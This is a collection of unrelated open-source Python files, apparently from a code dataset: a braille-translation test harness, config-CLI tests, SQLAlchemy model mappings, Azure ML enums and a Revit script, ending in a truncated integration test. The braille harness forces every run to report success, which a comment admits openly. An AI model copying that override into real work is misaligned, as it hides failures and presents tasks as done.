('gamma_max', T.max(self.gamma))]
# class LRN(Template):
# """
# Adapted from pylearn2
# Local Response Normalization
# """
#
# def __init__(self, n=5, alpha=0.0001, beta=0.75, k=2):
# super(LRN, self).__init__()
# self.n = n
# self.alpha = alpha
# self.beta = beta
# self.k = k
# assert self.n % 2 == 1, 'only odd n is supported'
#
# def _train_fprop(self, state_below):
# half = self.n / 2
# sq = T.sqr(state_below)
# b, ch, r, c = state_below.shape
# extra_channels = T.alloc(0., b, ch + 2*half, r, c)
# sq = T.set_subtensor(extra_channels[:,half:half+ch,:,:], sq)
# scale = self.k
#
# for i in xrange(self.n):
# scale += self.alpha * sq[:,i:i+ch,:,:]
#
# scale = scale ** self.beta
# return state_below / scale
#
# def _test_fprop(self, state_below):
# return self._train_fprop(state_below)
|
nodes/1.x/python/Material.Properties.py | jdehotin/Clockworkfordynamo | 147 | 12799027 | <gh_stars>100-1000
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
mats = UnwrapElement(IN[0])
colorlist = list()
glowlist = list()
classlist = list()
shinylist = list()
smoothlist = list()
translist = list()
for mat in mats:
colorlist.append(mat.Color)
if mat.Glow:
glowlist.append(True)
else:
glowlist.append(False)
classlist.append(mat.MaterialClass)
shinylist.append(mat.Shininess)
smoothlist.append(mat.Smoothness)
translist.append(mat.Transparency)
OUT = (classlist,colorlist,glowlist,shinylist,smoothlist,translist) |
third_party/liblouis/src/tests/harness/runHarness.py | zipated/src | 2,151 | 12799073 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Liblouis test harness
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
#
# Copyright (c) 2012, liblouis team, <NAME>.
"""Liblouis test harness:
Please see the liblouis documentation for information of how to add a new harness or more tests for your braille table.
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
@author: <NAME> <<EMAIL>>
"""
import json
import os
import sys
import traceback
from glob import iglob
from louis import translate, backTranslateString, hyphenate
from louis import noContractions, compbrlAtCursor, dotsIO, comp8Dots, pass1Only, compbrlLeftCursor, otherTrans, ucBrl
try:
from nose.plugins import Plugin
from nose import run
except ImportError:
sys.stderr.write("The harness tests require nose. Skipping...\n")
sys.exit(0)
### Nosetest plugin for controlling the output format. ###
class Reporter(Plugin):
name = 'reporter'
def __init__(self):
super(Reporter, self).__init__()
self.res = []
self.stream = None
def setOutputStream(self, stream):
# grab for own use
self.stream = stream
# return dummy stream
class dummy:
def write(self, *arg):
pass
def writeln(self, *arg):
pass
def flush(self):
pass
d = dummy()
return d
def addError(self, test, err):
exctype, value, tb = err
errMsg = ''.join(traceback.format_exception(exctype, value, tb))
self.res.append("--- Error: ---\n%s\n--- end ---\n" % errMsg)
def addFailure(self, test, err):
exctype, value, tb = err
#errMsg = ''.join(traceback.format_exception(exctype, value, None))
self.res.append("%s\n" % value)
def finalize(self, result):
failures=len(result.failures)
errors=len(result.errors)
total=result.testsRun
percent_string = " ({percent}% success)".format(percent=round((total-failures-errors+0.0)/total*100,2)) if total > 0 else ""
self.res.append("Ran {total} tests{percent_string}, with {failures} failures and {errors} errors.\n".format(total=total, percent_string=percent_string, failures=failures, errors=errors))
self.stream.write("\n".join(self.res))
### End of nosetest plugin for controlling the output format. ###
PY2 = sys.version_info[0] == 2
def u(a):
if PY2:
return a.encode("utf-8")
return a
modes = {
'noContractions': noContractions,
'compbrlAtCursor': compbrlAtCursor,
'dotsIO': dotsIO,
'comp8Dots': comp8Dots,
'pass1Only': pass1Only,
'compbrlLeftCursor': compbrlLeftCursor,
'otherTrans': otherTrans,
'ucBrl': ucBrl
}
def showCurPos(length, pos1, marker1="^", pos2=None, marker2="*"):
"""A helper function to make a string to show the position of the given cursor."""
display = [" "] *length
display[pos1] = marker1
if pos2:
display[pos2] = marker2
return "".join(display)
class BrailleTest():
def __init__(self, harnessName, tables, input, output, outputUniBrl=False, mode=0, cursorPos=None, brlCursorPos=None, testmode='translate', comment=[]):
self.harnessName = harnessName
self.tables = tables
if outputUniBrl:
self.tables.insert(0, 'unicode.dis')
self.input = input
self.expectedOutput = output
self.mode = mode if not mode else modes[mode]
self.cursorPos = cursorPos
self.expectedBrlCursorPos = brlCursorPos
self.comment = comment
self.testmode = testmode
def __str__(self):
return "%s" % self.harnessName
def hyphenateword(self, tables, word, mode):
# FIXME: liblouis currently crashes if we dont add space at end of the word, probably due to a counter running past the end of the string.
# medium/longterm this hack should be removed, and the root of the problem found/resolved.
hyphen_mask=hyphenate(tables, word+' ', mode)
# FIXME: why on python 2 do we need to remove the last item, and on python3 it is needed?
# i.e. in python2 word and hyphen_mask not of the same length.
if PY2:
return "".join( map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)[:-1] )
else:
return "".join( list(map(lambda a,b: "-"+a if b=='1' else a, word, hyphen_mask)) )
def check_translate(self):
if self.cursorPos is not None:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
else:
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
tBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos)
report = [
"--- Braille Difference Failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected brl:", self.expectedOutput),
template % ("actual brl:", tBrl),
"--- end ---",
]
assert tBrl == self.expectedOutput, u("\n".join(report))
def check_backtranslate(self):
backtranslate_output = backTranslateString(self.tables, self.input, None, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Backtranslate failure: %s ---" % self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("expected text:", self.expectedOutput),
template % ("actual backtranslated text:", backtranslate_output),
"--- end ---",
]
assert backtranslate_output == self.expectedOutput, u("\n".join(report))
def check_cursor(self):
tBrl, temp1, temp2, tBrlCurPos = translate(self.tables, self.input, mode=self.mode, cursorPos=self.cursorPos)
template = "%-25s '%s'"
etBrlCurPosStr = showCurPos(len(tBrl), tBrlCurPos, pos2=self.expectedBrlCursorPos)
report = [
"--- Braille Cursor Difference Failure: %s ---" %self.__str__(),
template % ("comment:", "".join(self.comment)),
template % ("input:", self.input),
template % ("received brl:", tBrl),
template % ("BRLCursorAt %d expected %d:" %(tBrlCurPos, self.expectedBrlCursorPos),
etBrlCurPosStr),
"--- end ---"
]
assert tBrlCurPos == self.expectedBrlCursorPos, u("\n".join(report))
def check_hyphenate(self):
hyphenated_word = self.hyphenateword(self.tables, self.input, mode=self.mode)
template = "%-25s '%s'"
report = [
"--- Hyphenation failure: %s ---" % self.__str__(),
template % ("input:", self.input),
template % ("expected hyphenated word:", self.expectedOutput),
template % ("actual hyphenated word:", hyphenated_word),
"--- end ---",
]
assert hyphenated_word == self.expectedOutput, u("\n".join(report))
def test_allCases():
if 'HARNESS_DIR' in os.environ:
# we assume that if HARNESS_DIR is set that we are invoked from
# the Makefile, i.e. all the paths to the Python test files and
# the test tables are set correctly.
harness_dir = os.environ['HARNESS_DIR']
else:
# we are not invoked via the Makefile, i.e. we have to set up the
# paths (LOUIS_TABLEPATH) manually.
harness_dir = "."
# make sure local test braille tables are found
os.environ['LOUIS_TABLEPATH'] = '../tables,../../tables'
testfiles=[]
if len(sys.argv)>1:
# grab the test files from the arguments
for test_file in sys.argv[1:]:
testfiles.extend(iglob(os.path.join(harness_dir, test_file)))
else:
# Process all *_harness.txt files in the harness directory.
testfiles=iglob(os.path.join(harness_dir, '*_harness.txt'))
for harness in testfiles:
f = open(harness, 'r')
try:
harnessModule = json.load(f, encoding="UTF-8")
except ValueError as e:
raise ValueError("%s doesn't look like a harness file, %s" %(harness, e.message))
f.close()
tableList = []
if isinstance(harnessModule['tables'], list):
tableList.extend(harnessModule['tables'])
else:
tableList.append(harnessModule['tables'])
origflags = {'testmode':'translate'}
for section in harnessModule['tests']:
flags = origflags.copy()
flags.update(section.get('flags', {}))
for testData in section['data']:
test = flags.copy()
testTables = tableList[:]
test.update(testData)
bt = BrailleTest(harness, testTables, **test)
if test['testmode'] == 'translate':
yield bt.check_translate
if 'cursorPos' in test:
yield bt.check_cursor
if test['testmode'] == 'backtranslate':
yield bt.check_backtranslate
if test['testmode'] == 'hyphenate':
yield bt.check_hyphenate
if __name__ == '__main__':
result = run(addplugins=[Reporter()], argv=['-v', '--with-reporter', sys.argv[0]], defaultTest=__name__)
# FIXME: Ideally the harness tests should return the result of the
# tests. However since there is no way to mark a test as expected
# failure ATM we would have to disable a whole file of tests. So,
# for this release we will pretend all tests succeeded and will
# add a @expected_test feature for the next release. See also
# http://stackoverflow.com/questions/9613932/nose-plugin-for-expected-failures
result = True
sys.exit(0 if result else 1)
|
tests/cli/test_base.py | ssato/python-anyconfig | 213 | 12799082 | #
# Copyright (C) 2013 - 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
"""test cases for anyconfig.cli module.
"""
import contextlib
import io
import pathlib
import sys
import tempfile
import unittest
import anyconfig.api
import anyconfig.cli as TT
from .. import base
from . import collectors, datatypes
def make_args(_self, tdata):
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts + [str(tdata.inp_path)]
class BaseTestCase(unittest.TestCase):
"""Base Test case.
"""
collector = collectors.Collector()
make_args = make_args
def setUp(self):
if self.collector:
self.collector.init()
def post_checks(self, tdata, *args, **kwargs):
"""Placeholder to do more post checks.
"""
pass
def _run_main(self, tdata):
"""Wrapper for cli.main."""
args = self.make_args(tdata)
if tdata.outname: # Running cli.main will output files.
self.assertTrue(
tdata.ref is not None,
'No reference data was given, {tdata!r}'
)
with tempfile.TemporaryDirectory() as tdir:
opath = pathlib.Path(tdir) / tdata.outname
# Run anyconfig.cli.main with arguments.
TT.main(args + ['-o', str(opath)])
if tdata.exp.exit_code_matches and tdata.exp.exit_code == 0:
self.assertTrue(opath.exists(), str(opath))
try:
odata = anyconfig.api.load(opath, **tdata.oo_opts)
except anyconfig.api.UnknownFileTypeError:
odata = anyconfig.api.load(opath, ac_parser='json')
self.assertEqual(odata, tdata.ref, repr(tdata))
self.post_checks(tdata, opath)
else:
# Likewise but without -o <output_path> option.
TT.main(args)
self.post_checks(tdata)
sys.exit(0)
def run_main(self, tdata) -> None:
"""
Run anyconfig.cli.main and check if the exit code was expected one.
"""
expected: datatypes.Expected = tdata.exp
with self.assertRaises(expected.exception, msg=repr(tdata)) as ctx:
with contextlib.redirect_stdout(io.StringIO()) as stdout:
with contextlib.redirect_stderr(io.StringIO()) as stderr:
self._run_main(tdata)
exc = ctx.exception
self.assertTrue(isinstance(exc, expected.exception))
ecode = getattr(exc, 'error_code', getattr(exc, 'code', 1))
if expected.exit_code_matches:
self.assertEqual(ecode, expected.exit_code, f'{tdata!r}')
else:
self.assertNotEqual(ecode, expected.exit_code, f'{tdata!r}')
if expected.words_in_stdout:
msg = stdout.getvalue()
self.assertTrue(expected.words_in_stdout in msg, msg)
if expected.words_in_stderr:
err = stderr.getvalue()
self.assertTrue(expected.words_in_stderr in err, err)
def test_runs_for_datasets(self) -> None:
if self.collector and self.collector.initialized:
if self.collector.kind == base.TDataCollector.kind:
return
for tdata in self.collector.each_data():
self.run_main(tdata)
class NoInputTestCase(BaseTestCase):
"""Test cases which does not require inputs.
"""
def make_args(self, tdata): # pylint: disable=no-self-use
"""Make arguments to run cli.main.
"""
return ['anyconfig_cli'] + tdata.opts
# vim:sw=4:ts=4:et:
|
src/ebonite/ext/sqlalchemy/models.py | zyfra/ebonite | 270 | 12799124 | from abc import abstractmethod
from typing import Any, Dict, Iterable, List, Optional, Type, TypeVar
from pyjackson import dumps, loads
from sqlalchemy import Column, DateTime, ForeignKey, Integer, String, Text, UniqueConstraint
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from ebonite.core.objects import DatasetType
from ebonite.core.objects.artifacts import ArtifactCollection
from ebonite.core.objects.core import (Buildable, EvaluationResults, EvaluationSet, Image, Model, Pipeline,
PipelineStep, Project, RuntimeEnvironment, RuntimeInstance, Task)
from ebonite.core.objects.dataset_source import DatasetSource
from ebonite.core.objects.metric import Metric
from ebonite.core.objects.requirements import Requirements
SQL_OBJECT_FIELD = '_sqlalchemy_object'
def json_column():
return Column(Text)
def safe_loads(payload, as_class):
return loads(payload, Optional[as_class])
def sqlobject(obj):
return getattr(obj, SQL_OBJECT_FIELD, None)
def update_attrs(obj, **attrs):
for name, value in attrs.items():
setattr(obj, name, value)
T = TypeVar('T')
S = TypeVar('S', bound='Attaching')
class Attaching:
id = ...
name = ...
def attach(self, obj):
setattr(obj, SQL_OBJECT_FIELD, self)
return obj
@classmethod
def from_obj(cls: Type[S], obj: T, new=False) -> S:
kwargs = cls.get_kwargs(obj)
existing = sqlobject(obj)
if not new and existing is not None:
update_attrs(existing, **kwargs)
return existing
return cls(**kwargs)
@classmethod
@abstractmethod
def get_kwargs(cls, obj: T) -> dict:
pass # pragma: no cover
@abstractmethod
def to_obj(self) -> T:
pass # pragma: no cover
Base = declarative_base()
class SProject(Base, Attaching):
__tablename__ = 'projects'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
tasks: Iterable['STask'] = relationship("STask", back_populates="project")
def to_obj(self) -> Project:
p = Project(self.name, id=self.id, author=self.author, creation_date=self.creation_date)
for task in self.tasks:
p._tasks.add(task.to_obj())
return self.attach(p)
@classmethod
def get_kwargs(cls, project: Project) -> dict:
return dict(id=project.id,
name=project.name,
author=project.author,
creation_date=project.creation_date,
tasks=[STask.from_obj(t) for t in project.tasks.values()])
class STask(Base, Attaching):
__tablename__ = 'tasks'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
project_id = Column(Integer, ForeignKey('projects.id'), nullable=False)
project = relationship("SProject", back_populates="tasks")
models: Iterable['SModel'] = relationship("SModel", back_populates="task")
pipelines: Iterable['SPipeline'] = relationship("SPipeline", back_populates='task')
images: Iterable['SImage'] = relationship("SImage", back_populates='task')
datasets = Column(Text)
metrics = Column(Text)
evaluation_sets = Column(Text)
__table_args__ = (UniqueConstraint('name', 'project_id', name='tasks_name_and_ref'),)
def to_obj(self) -> Task:
task = Task(id=self.id,
name=self.name,
author=self.author,
creation_date=self.creation_date,
project_id=self.project_id,
datasets=safe_loads(self.datasets, Dict[str, DatasetSource]),
metrics=safe_loads(self.metrics, Dict[str, Metric]),
evaluation_sets=safe_loads(self.evaluation_sets, Dict[str, EvaluationSet]))
for model in self.models:
task._models.add(model.to_obj())
for pipeline in self.pipelines:
task._pipelines.add(pipeline.to_obj())
for image in self.images:
task._images.add(image.to_obj())
return self.attach(task)
@classmethod
def get_kwargs(cls, task: Task) -> dict:
return dict(id=task.id,
name=task.name,
author=task.author,
creation_date=task.creation_date,
project_id=task.project_id,
models=[SModel.from_obj(m) for m in task.models.values()],
images=[SImage.from_obj(i) for i in task.images.values()],
pipelines=[SPipeline.from_obj(p) for p in task.pipelines.values()],
datasets=dumps(task.datasets),
metrics=dumps(task.metrics),
evaluation_sets=dumps(task.evaluation_sets))
class SModel(Base, Attaching):
__tablename__ = 'models'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
wrapper = Column(Text)
artifact = Column(Text)
requirements = Column(Text)
description = Column(Text)
params = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="models")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='models_name_and_ref'),)
def to_obj(self) -> Model:
model = Model(name=self.name,
wrapper_meta=safe_loads(self.wrapper, dict),
author=self.author,
creation_date=self.creation_date,
artifact=safe_loads(self.artifact, ArtifactCollection),
requirements=safe_loads(self.requirements, Requirements),
description=self.description,
params=safe_loads(self.params, Dict[str, Any]),
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, Dict[str, EvaluationResults]))
return self.attach(model)
@classmethod
def get_kwargs(cls, model: Model) -> dict:
return dict(id=model.id,
name=model.name,
author=model.author,
creation_date=model.creation_date,
wrapper=dumps(model.wrapper_meta),
artifact=dumps(model.artifact),
requirements=dumps(model.requirements),
description=model.description,
params=dumps(model.params),
task_id=model.task_id,
evaluations=dumps(model.evaluations))
class SPipeline(Base, Attaching):
__tablename__ = 'pipelines'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
steps = Column(Text)
input_data = Column(Text)
output_data = Column(Text)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="pipelines")
evaluations = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='pipelines_name_and_ref'),)
def to_obj(self) -> Pipeline:
pipeline = Pipeline(name=self.name,
steps=safe_loads(self.steps, List[PipelineStep]),
input_data=safe_loads(self.input_data, DatasetType),
output_data=safe_loads(self.output_data, DatasetType),
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
evaluations=safe_loads(self.evaluations, EvaluationResults))
return self.attach(pipeline)
@classmethod
def get_kwargs(cls, pipeline: Pipeline) -> dict:
return dict(id=pipeline.id,
name=pipeline.name,
author=pipeline.author,
creation_date=pipeline.creation_date,
steps=dumps(pipeline.steps),
input_data=dumps(pipeline.input_data),
output_data=dumps(pipeline.output_data),
task_id=pipeline.task_id,
evaluations=dumps(pipeline.evaluations))
class SImage(Base, Attaching):
__tablename__ = 'images'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
task_id = Column(Integer, ForeignKey('tasks.id'), nullable=False)
task = relationship("STask", back_populates="images")
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
source = Column(Text)
__table_args__ = (UniqueConstraint('name', 'task_id', name='image_name_and_ref'),)
def to_obj(self) -> Image:
image = Image(name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
task_id=self.task_id,
params=safe_loads(self.params, Image.Params),
source=safe_loads(self.source, Buildable),
environment_id=self.environment_id)
return self.attach(image)
@classmethod
def get_kwargs(cls, image: Image) -> dict:
return dict(id=image.id,
name=image.name,
author=image.author,
creation_date=image.creation_date,
task_id=image.task_id,
params=dumps(image.params),
source=dumps(image.source),
environment_id=image.environment_id)
class SRuntimeEnvironment(Base, Attaching):
__tablename__ = 'environments'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=True, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
params = Column(Text)
def to_obj(self) -> RuntimeEnvironment:
environment = RuntimeEnvironment(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
params=safe_loads(self.params, RuntimeEnvironment.Params))
return self.attach(environment)
@classmethod
def get_kwargs(cls, environment: RuntimeEnvironment) -> dict:
return dict(id=environment.id,
name=environment.name,
author=environment.author,
creation_date=environment.creation_date,
params=dumps(environment.params))
class SRuntimeInstance(Base, Attaching):
__tablename__ = 'instances'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String, unique=False, nullable=False)
author = Column(String, unique=False, nullable=False)
creation_date = Column(DateTime, unique=False, nullable=False)
image_id = Column(Integer, ForeignKey('images.id'), nullable=False)
environment_id = Column(Integer, ForeignKey('environments.id'), nullable=False)
params = Column(Text)
__table_args__ = (UniqueConstraint('name', 'image_id', 'environment_id', name='instance_name_and_ref'),)
def to_obj(self) -> RuntimeInstance:
instance = RuntimeInstance(
name=self.name,
author=self.author,
creation_date=self.creation_date,
id=self.id,
image_id=self.image_id,
environment_id=self.environment_id,
params=safe_loads(self.params, RuntimeInstance.Params))
return self.attach(instance)
@classmethod
def get_kwargs(cls, instance: RuntimeInstance) -> dict:
return dict(id=instance.id,
name=instance.name,
author=instance.author,
creation_date=instance.creation_date,
image_id=instance.image_id,
environment_id=instance.environment_id,
params=dumps(instance.params))
|
sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_azure_machine_learning_workspaces_enums.py | rsdoherty/azure-sdk-for-python | 2,728 | 12799223 | <filename>sdk/machinelearning/azure-mgmt-machinelearningservices/azure/mgmt/machinelearningservices/models/_azure_machine_learning_workspaces_enums.py
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AllocationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Allocation state of the compute. Possible values are: steady - Indicates that the compute is
not resizing. There are no changes to the number of compute nodes in the compute in progress. A
compute enters this state when it is created and when no operations are being performed on the
compute to change the number of compute nodes. resizing - Indicates that the compute is
resizing; that is, compute nodes are being added to or removed from the compute.
"""
STEADY = "Steady"
RESIZING = "Resizing"
class ApplicationSharingPolicy(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Policy for sharing applications on this compute instance among users of parent workspace. If
Personal, only the creator can access applications on this compute instance. When Shared, any
workspace user can access applications on this instance depending on his/her assigned role.
"""
PERSONAL = "Personal"
SHARED = "Shared"
class BillingCurrency(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Three lettered code specifying the currency of the VM price. Example: USD
"""
USD = "USD"
class ComputeInstanceState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Current state of a ComputeInstance.
"""
CREATING = "Creating"
CREATE_FAILED = "CreateFailed"
DELETING = "Deleting"
RUNNING = "Running"
RESTARTING = "Restarting"
JOB_RUNNING = "JobRunning"
SETTING_UP = "SettingUp"
SETUP_FAILED = "SetupFailed"
STARTING = "Starting"
STOPPED = "Stopped"
STOPPING = "Stopping"
USER_SETTING_UP = "UserSettingUp"
USER_SETUP_FAILED = "UserSetupFailed"
UNKNOWN = "Unknown"
UNUSABLE = "Unusable"
class ComputeType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of compute
"""
AKS = "AKS"
AML_COMPUTE = "AmlCompute"
COMPUTE_INSTANCE = "ComputeInstance"
DATA_FACTORY = "DataFactory"
VIRTUAL_MACHINE = "VirtualMachine"
HD_INSIGHT = "HDInsight"
DATABRICKS = "Databricks"
DATA_LAKE_ANALYTICS = "DataLakeAnalytics"
class EncryptionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Indicates whether or not the encryption is enabled for the workspace.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class NodeState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the compute node. Values are idle, running, preparing, unusable, leaving and
preempted.
"""
IDLE = "idle"
RUNNING = "running"
PREPARING = "preparing"
UNUSABLE = "unusable"
LEAVING = "leaving"
PREEMPTED = "preempted"
class OperationName(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Name of the last operation.
"""
CREATE = "Create"
START = "Start"
STOP = "Stop"
RESTART = "Restart"
REIMAGE = "Reimage"
DELETE = "Delete"
class OperationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Operation status.
"""
IN_PROGRESS = "InProgress"
SUCCEEDED = "Succeeded"
CREATE_FAILED = "CreateFailed"
START_FAILED = "StartFailed"
STOP_FAILED = "StopFailed"
RESTART_FAILED = "RestartFailed"
REIMAGE_FAILED = "ReimageFailed"
DELETE_FAILED = "DeleteFailed"
class PrivateEndpointConnectionProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current provisioning state.
"""
SUCCEEDED = "Succeeded"
CREATING = "Creating"
DELETING = "Deleting"
FAILED = "Failed"
class PrivateEndpointServiceConnectionStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The private endpoint connection status.
"""
PENDING = "Pending"
APPROVED = "Approved"
REJECTED = "Rejected"
DISCONNECTED = "Disconnected"
TIMEOUT = "Timeout"
class ProvisioningState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The current deployment state of workspace resource. The provisioningState is to indicate states
for resource provisioning.
"""
UNKNOWN = "Unknown"
UPDATING = "Updating"
CREATING = "Creating"
DELETING = "Deleting"
SUCCEEDED = "Succeeded"
FAILED = "Failed"
CANCELED = "Canceled"
class QuotaUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""An enum describing the unit of quota measurement.
"""
COUNT = "Count"
class ReasonCode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The reason for the restriction.
"""
NOT_SPECIFIED = "NotSpecified"
NOT_AVAILABLE_FOR_REGION = "NotAvailableForRegion"
NOT_AVAILABLE_FOR_SUBSCRIPTION = "NotAvailableForSubscription"
class RemoteLoginPortPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh
port is closed on all nodes of the cluster. Enabled - Indicates that the public ssh port is
open on all nodes of the cluster. NotSpecified - Indicates that the public ssh port is closed
on all nodes of the cluster if VNet is defined, else is open all public nodes. It can be
default only during cluster creation time, after creation it will be either enabled or
disabled.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
NOT_SPECIFIED = "NotSpecified"
class ResourceIdentityType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The identity type.
"""
SYSTEM_ASSIGNED = "SystemAssigned"
USER_ASSIGNED = "UserAssigned"
SYSTEM_ASSIGNED_USER_ASSIGNED = "SystemAssigned,UserAssigned"
NONE = "None"
class SshPublicAccess(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""State of the public SSH port. Possible values are: Disabled - Indicates that the public ssh
port is closed on this instance. Enabled - Indicates that the public ssh port is open and
accessible according to the VNet/subnet policy if applicable.
"""
ENABLED = "Enabled"
DISABLED = "Disabled"
class SslConfigurationStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Enable or disable ssl for scoring
"""
DISABLED = "Disabled"
ENABLED = "Enabled"
class Status(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Status of update workspace quota.
"""
UNDEFINED = "Undefined"
SUCCESS = "Success"
FAILURE = "Failure"
INVALID_QUOTA_BELOW_CLUSTER_MINIMUM = "InvalidQuotaBelowClusterMinimum"
INVALID_QUOTA_EXCEEDS_SUBSCRIPTION_LIMIT = "InvalidQuotaExceedsSubscriptionLimit"
INVALID_VM_FAMILY_NAME = "InvalidVMFamilyName"
OPERATION_NOT_SUPPORTED_FOR_SKU = "OperationNotSupportedForSku"
OPERATION_NOT_ENABLED_FOR_REGION = "OperationNotEnabledForRegion"
class UnderlyingResourceAction(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
DELETE = "Delete"
DETACH = "Detach"
class UnitOfMeasure(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The unit of time measurement for the specified VM price. Example: OneHour
"""
ONE_HOUR = "OneHour"
class UsageUnit(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""An enum describing the unit of usage measurement.
"""
COUNT = "Count"
class VMPriceOSType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Operating system type used by the VM.
"""
LINUX = "Linux"
WINDOWS = "Windows"
class VmPriority(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Virtual Machine priority
"""
DEDICATED = "Dedicated"
LOW_PRIORITY = "LowPriority"
class VMTier(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""The type of the VM.
"""
STANDARD = "Standard"
LOW_PRIORITY = "LowPriority"
SPOT = "Spot"
|
Packs/SecurityAdvisor/Integrations/SecurityAdvisor/SecurityAdvisor_test.py | diCagri/content | 799 | 12799252 | <reponame>diCagri/content<filename>Packs/SecurityAdvisor/Integrations/SecurityAdvisor/SecurityAdvisor_test.py
import SecurityAdvisor
URL_SUFFIX = 'apis/coachuser/'
BASE_URL = 'https://www.securityadvisor.io/'
CONTEXT_JSON = {
"SecurityAdvisor.CoachUser": {
"coaching_date": "2019-10-04T21:04:19.480425",
"coaching_status": "Pending",
"coaching_score": "",
"user": "<EMAIL>",
"context": "phishing",
"message": "Coaching Sent"
}
}
RESPONSE_JSON = {
"coaching_date": "2019-10-04T21:04:19.480425",
"coaching_status": "Pending",
"coaching_score": "",
"user": "<EMAIL>",
"context": "phishing",
"message": "Coaching Sent"
}
HEADERS = {
